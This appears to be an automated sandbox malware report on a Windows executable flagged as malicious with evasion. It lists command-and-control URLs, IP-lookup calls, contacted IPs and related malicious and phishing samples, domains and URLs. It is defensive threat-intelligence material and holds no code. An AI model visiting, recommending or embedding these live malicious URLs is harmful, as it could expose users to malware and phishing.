                      https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpocatjhdfer3s_jh3de.exe, 00000000.00000003.3145136194.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2853835701.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2326344558.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3378348101.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3211078064.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2911907019.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3028652538.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2210136155.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3325565275.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3097247567.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2970308060.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2795674163.0000000003504000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php~Zjhdfer3s_jh3de.exe, 00000000.00000003.2326344558.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3378348101.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2560079998.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2911907019.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3436971698.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2098827051.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3028652538.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2210136155.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3325565275.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3097247567.0000000003504000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://hongbaow.info/baow.info/jhdfer3s_jh3de.exe, 00000000.00000003.1918744844.0000000003550000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://api.iplocation.net/jhdfer3s_jh3de.exe, 00000000.00000003.3145136194.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2853835701.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2326344558.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2151326900.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3378348101.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2034486376.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3559108864.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3616364062.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2501939925.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3211078064.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.1860385893.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2560079998.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.1918687028.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.1785453107.0000000003508000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2911907019.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3436971698.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2098827051.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2678352941.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2443449461.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3028652538.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2210136155.0000000003504000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://hongbaow.info/Bjhdfer3s_jh3de.exe, 00000000.00000003.2560079998.0000000003504000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://api.iplocation.net/?cmd=ip-country&ip=8.46.123.1899jhdfer3s_jh3de.exe, 00000000.00000003.1785453107.0000000003508000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpgjhdfer3s_jh3de.exe, 00000000.00000003.3145113665.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2795648427.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3378153155.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2443167329.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2326084917.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3558965547.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2853814644.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3616335320.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2098807259.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2970287415.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2559977110.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2911726400.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3210978854.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2034537498.0000000003565000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3097230184.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3028603361.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3436831948.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2501916876.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2678157513.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3325432064.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2210113032.0000000003560000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://hongbaow.info/baow.info/lofzqFkc7.phpjhdfer3s_jh3de.exe, 00000000.00000003.2443167329.000000000354C000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://hongbaow.info/Rjhdfer3s_jh3de.exe, 00000000.00000003.1860385893.0000000003504000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://hongbaow.info/Sjhdfer3s_jh3de.exe, 00000000.00000003.1860385893.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.1918687028.0000000003504000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://hongbaow.info/Tjhdfer3s_jh3de.exe, 00000000.00000003.2326344558.0000000003504000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpUnivXjhdfer3s_jh3de.exe, 00000000.00000003.2326344558.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3378348101.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.1860385893.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.1918687028.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3097247567.0000000003504000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://hongbaow.info/YTjhdfer3s_jh3de.exe, 00000000.00000003.2911907019.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2678352941.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3028652538.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2970308060.0000000003504000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://hongbaow.info/Yjhdfer3s_jh3de.exe, 00000000.00000003.1983537025.0000000003504000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://hongbaow.info/WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpjhdfer3s_jh3de.exe, 00000000.00000002.3627602678.000000000354C000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://hongbaow.info/1Bjhdfer3s_jh3de.exe, 00000000.00000003.3559108864.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3616364062.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3436971698.0000000003504000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000002.3627558519.0000000003504000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpUniversejhdfer3s_jh3de.exe, 00000000.00000003.3145113665.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2795648427.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3378153155.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2443167329.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2326084917.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3558965547.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2853814644.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3616335320.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2970287415.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2559977110.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2911726400.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3210978854.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3097230184.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3028603361.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3436831948.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2501916876.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2678157513.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3325432064.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2210113032.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2151303994.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2501630611.0000000003560000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpersejhdfer3s_jh3de.exe, 00000000.00000003.3145113665.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2795648427.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3378153155.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3558965547.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2853814644.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3616335320.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2970287415.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2559977110.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2911726400.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3210978854.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3097230184.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3028603361.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3436831948.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2501916876.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2678157513.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3325432064.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2501630611.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3616018816.0000000003560000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://hongbaow.info/1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.phpwjhdfer3s_jh3de.exe, 00000000.00000003.3145113665.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2795648427.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3378153155.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3558965547.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2853814644.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3616335320.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2970287415.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2559977110.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2911726400.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3210978854.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3097230184.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3028603361.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3436831948.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.2678157513.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3325432064.0000000003560000.00000004.00000020.00020000.00000000.sdmp, jhdfer3s_jh3de.exe, 00000000.00000003.3616018816.0000000003560000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://myexternalip.com/jhdfer3s_jh3de.exe, 00000000.00000002.3627003255.0000000000E53000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            104.21.48.1
                            		hongbaow.infoUnited States
                            		13335CLOUDFLARENETUSfalse
                            104.26.7.214
                            		api.iplocation.netUnited States
                            		13335CLOUDFLARENETUSfalse
                            34.160.111.145
                            		myexternalip.comUnited States
                            		2686ATGS-MMD-ASUSfalse

                            General Information

                            Joe Sandbox version:42.0.0 Malachite
                            Analysis ID:1596616
                            Start date and time:2025-01-22 08:40:48 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 6m 28s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Run name:Run with higher sleep bypass
                            Number of analysed new started processes analysed:6
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:jhdfer3s_jh3de.exe
                            Detection:MAL
                            Classification:mal68.evad.winEXE@2/1@3/3
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 94%
                            • Number of executed functions: 26
                            • Number of non-executed functions: 74
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                            • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                            Warnings

                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                            • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

                            No simulations

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            104.21.48.1PO#98540-00.exeGet hashmaliciousFormBookBrowse
                            • www.kdrqcyusevx.info/3gui/
                            Doc.exeGet hashmaliciousFormBookBrowse
                            • www.kdrqcyusevx.info/3gui/
                            PO#3210046374.exeGet hashmaliciousFormBookBrowse
                            • www.kdrqcyusevx.info/3gui/
                            SHIPMENT DETAILS PACKING LIST#316_2025.exeGet hashmaliciousFormBookBrowse
                            • www.cikolatasampuan.xyz/igu6/
                            ydJaT4b5N8.exeGet hashmaliciousFormBookBrowse
                            • www.vilakodsiy.sbs/vq3j/
                            NWPZbNcRxL.exeGet hashmaliciousFormBookBrowse
                            • www.axis138ae.shop/j2vs/
                            SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                            • twirpx.org/administrator/index.php
                            SN500, SN150 Spec.exeGet hashmaliciousFormBookBrowse
                            • www.antipromil.site/7ykh/
                            104.26.7.214fuol91mv.exeGet hashmaliciousUnknownBrowse
                              http://ys-notification-priority-fb-mail.netlify.app/Get hashmaliciousUnknownBrowse
                                https://ey-notification-priority-fb-mail.netlify.app/Get hashmaliciousUnknownBrowse
                                  https://www.youtube.com/attribution_link?c=coachblog-ytm-acq-int-blog-txt-coach&u=https://www.sayfiereview.com/follow_outlink?url=https://dfs.herstshaprvn%E3%80%82com?id=com.google.android.apps.youtube.musicGet hashmaliciousHTMLPhisherBrowse
                                    https://www.youtube.com/attribution_link?c=coachblog-ytm-acq-int-blog-txt-coach&u=https://f%E2%93%90urholdtkommu%E2%93%9Dikatio%E2%93%9D-m%E2%93%A8.sh%E2%93%90re%E2%93%9Foint.com/:b:/g/personal/mikkel_faurholdt_com/EWts2f1DTE9GjG5fTcFSE50Bo0SXL2o6ityk-PEdrnkcbQ?e=c8X1Ps%3Fid%3Dcom.google.android.apps.youtube.musicGet hashmaliciousHTMLPhisherBrowse
                                      34.160.111.145SparkWarriors 1.0.0.exeGet hashmaliciousUnknownBrowse
                                      • ifconfig.me/
                                      W7pJyWRuxS.ps1Get hashmaliciousUnknownBrowse
                                      • ifconfig.me/
                                      cdwzGB7ix5.ps1Get hashmaliciousUnknownBrowse
                                      • ifconfig.me/
                                      file.exeGet hashmaliciousHackBrowser, XmrigBrowse
                                      • ifconfig.me/
                                      Creal.exeGet hashmaliciousCreal StealerBrowse
                                      • ifconfig.me/
                                      #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeGet hashmaliciousBlank Grabber, Creal StealerBrowse
                                      • ifconfig.me/
                                      SecuriteInfo.com.Variant.Fragtor.599953.20231.7803.exeGet hashmaliciousDarkGate, MailPassViewBrowse
                                      • myexternalip.com/raw
                                      mek_n_bat.batGet hashmaliciousUnknownBrowse
                                      • ifconfig.me/ip
                                      dtyb0ut8vVGet hashmaliciousUnknownBrowse
                                      • ifconfig.me/
                                      file.exeGet hashmaliciousUnknownBrowse
                                      • /

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      myexternalip.comSoftware_Tool.exeGet hashmaliciousUnknownBrowse
                                      • 34.160.111.145
                                      Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                                      • 34.160.111.145
                                      KltG8Z7KCn.dllGet hashmaliciousUnknownBrowse
                                      • 34.160.111.145
                                      KltG8Z7KCn.dllGet hashmaliciousUnknownBrowse
                                      • 34.160.111.145
                                      https://www.lusha.com/privacy_topic/control-your-profile/Get hashmaliciousUnknownBrowse
                                      • 34.160.111.145
                                      Facturation.exeGet hashmaliciousDoeneriumBrowse
                                      • 34.160.111.145
                                      Facturation.exeGet hashmaliciousDoeneriumBrowse
                                      • 34.160.111.145
                                      SecuriteInfo.com.Variant.Fragtor.599953.20231.7803.exeGet hashmaliciousDarkGate, MailPassViewBrowse
                                      • 34.160.111.145
                                      fuol91mv.exeGet hashmaliciousUnknownBrowse
                                      • 34.160.111.145
                                      api.iplocation.netfuol91mv.exeGet hashmaliciousUnknownBrowse
                                      • 104.26.6.214
                                      fuol91mv.exeGet hashmaliciousUnknownBrowse
                                      • 104.26.7.214
                                      http://ys-notification-priority-fb-mail.netlify.app/Get hashmaliciousUnknownBrowse
                                      • 104.26.6.214
                                      https://ey-notification-priority-fb-mail.netlify.app/Get hashmaliciousUnknownBrowse
                                      • 104.26.6.214
                                      http://ur-notification-priority-fb-mail.netlify.app/Get hashmaliciousUnknownBrowse
                                      • 104.26.6.214

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      CLOUDFLARENETUS20252201_pdf.htmlGet hashmaliciousUnknownBrowse
                                      • 104.17.25.14
                                      http://www.nhtfxq.blogspot.ie/Get hashmaliciousPhisherBrowse
                                      • 172.67.222.219
                                      3y6C4vm3To.exeGet hashmaliciousUnknownBrowse
                                      • 172.64.41.3
                                      http://sahadayiz.com.tr/tec/les/K82cqkpomPEEC3lMMcYg4Gph6AcNsuj8uKaZh/anJvZmVAYmVsbHBvdHRlci5jb20uYXU=Get hashmaliciousHTMLPhisherBrowse
                                      • 104.18.95.41
                                      https://duskrise.shop/Get hashmaliciousUnknownBrowse
                                      • 104.16.123.96
                                      test.htaGet hashmaliciousVidarBrowse
                                      • 172.64.41.3
                                      4O724aDidp.exeGet hashmaliciousDCRatBrowse
                                      • 104.21.12.142
                                      wemustlearnfromthegreatnewswithgoodcoveragegettingthings.htaGet hashmaliciousBlackHacker JS Obfuscator, Cobalt StrikeBrowse
                                      • 104.21.16.1
                                      tgeh_1.svgGet hashmaliciousUnknownBrowse
                                      • 104.17.25.14
                                      CLOUDFLARENETUS20252201_pdf.htmlGet hashmaliciousUnknownBrowse
                                      • 104.17.25.14
                                      http://www.nhtfxq.blogspot.ie/Get hashmaliciousPhisherBrowse
                                      • 172.67.222.219
                                      3y6C4vm3To.exeGet hashmaliciousUnknownBrowse
                                      • 172.64.41.3
                                      http://sahadayiz.com.tr/tec/les/K82cqkpomPEEC3lMMcYg4Gph6AcNsuj8uKaZh/anJvZmVAYmVsbHBvdHRlci5jb20uYXU=Get hashmaliciousHTMLPhisherBrowse
                                      • 104.18.95.41
                                      https://duskrise.shop/Get hashmaliciousUnknownBrowse
                                      • 104.16.123.96
                                      test.htaGet hashmaliciousVidarBrowse
                                      • 172.64.41.3
                                      4O724aDidp.exeGet hashmaliciousDCRatBrowse
                                      • 104.21.12.142
                                      wemustlearnfromthegreatnewswithgoodcoveragegettingthings.htaGet hashmaliciousBlackHacker JS Obfuscator, Cobalt StrikeBrowse
                                      • 104.21.16.1
                                      tgeh_1.svgGet hashmaliciousUnknownBrowse
                                      • 104.17.25.14
                                      ATGS-MMD-ASUSx86.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 34.151.214.54
                                      87.121.79.19-mips-2025-01-22T04_20_52.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 32.115.128.83
                                      using python exe.exeGet hashmaliciousUnknownBrowse
                                      • 34.133.74.21
                                      using python exe.exeGet hashmaliciousUnknownBrowse
                                      • 34.133.74.21
                                      Anal Glory 5 Brazzers 2024 XXX WEBDL 540p SP...msiGet hashmaliciousUnknownBrowse
                                      • 34.1.227.231
                                      using python exe.msiGet hashmaliciousUnknownBrowse
                                      • 34.133.74.21
                                      VIRTUAL X MENU.msiGet hashmaliciousUnknownBrowse
                                      • 34.133.74.21
                                      https://pages.tempisite.com/uk-us-facebookGet hashmaliciousHTMLPhisherBrowse
                                      • 34.149.134.77
                                      https://goo.su/eR7m9BbGet hashmaliciousUnknownBrowse
                                      • 51.250.77.168

                                      JA3 Fingerprints

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      37f463bf4616ecd445d4a1937da06e19test.htaGet hashmaliciousVidarBrowse
                                      • 104.21.48.1
                                      • 104.26.7.214
                                      • 34.160.111.145
                                      CV Applicant 4890-17173.imgGet hashmaliciousUnknownBrowse
                                      • 104.21.48.1
                                      • 104.26.7.214
                                      • 34.160.111.145
                                      doc01210250121.jsGet hashmaliciousFormBookBrowse
                                      • 104.21.48.1
                                      • 104.26.7.214
                                      • 34.160.111.145
                                      ADtours0121025.Vbs.vbsGet hashmaliciousFormBookBrowse
                                      • 104.21.48.1
                                      • 104.26.7.214
                                      • 34.160.111.145
                                      11001_10032.jseGet hashmaliciousFormBookBrowse
                                      • 104.21.48.1
                                      • 104.26.7.214
                                      • 34.160.111.145
                                      jmkykhjksefkyt.exeGet hashmaliciousVidarBrowse
                                      • 104.21.48.1
                                      • 104.26.7.214
                                      • 34.160.111.145
                                      Setup (1).exeGet hashmaliciousUnknownBrowse
                                      • 104.21.48.1
                                      • 104.26.7.214
                                      • 34.160.111.145
